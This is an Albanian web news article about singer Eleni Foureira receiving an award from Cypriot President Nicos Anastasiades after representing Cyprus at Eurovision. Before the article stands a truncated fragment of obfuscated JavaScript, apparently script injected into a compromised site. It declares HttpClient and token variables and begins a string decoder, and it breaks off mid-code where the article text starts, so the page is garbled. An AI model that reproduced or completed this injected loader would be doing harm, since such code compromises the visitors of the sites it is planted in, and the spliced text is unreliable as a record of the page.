;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Këngëtarja shqiptare nderohet me çmim nga Presidenti i Qipros

By

Këngëtarja me origjinë shqiptare, Eleni Foureira, sivjet, përfaqësoi Qipron në Eurovision.

Pikërisht për këtë, artistja u nderua nga ky shtet.

Presidenti i Republikës së Qipros, Nicos Anastasiades, priti në takim këngëtaren të cilën e dekoroi me “çmim mirënjohje”.

Përmes një fotografie të postuar në Instagram, Eleni, tha se ndjehej krenare që përfaqësoi Qipron në Festivalin e Muzikës.

“E nderuar nga vlerësimi që mu bë nga presidenti Nicos Anastasiades. Jam krenare që përfaqësova Qipron në Eurovizion”.

Këngëtarja me origjinë shqiptare rrëmbeu zemrat e publikut europian, me performancën e saj në Eurovision me këngën “Fuego”./Prive.al

Artikuj të ngjashëm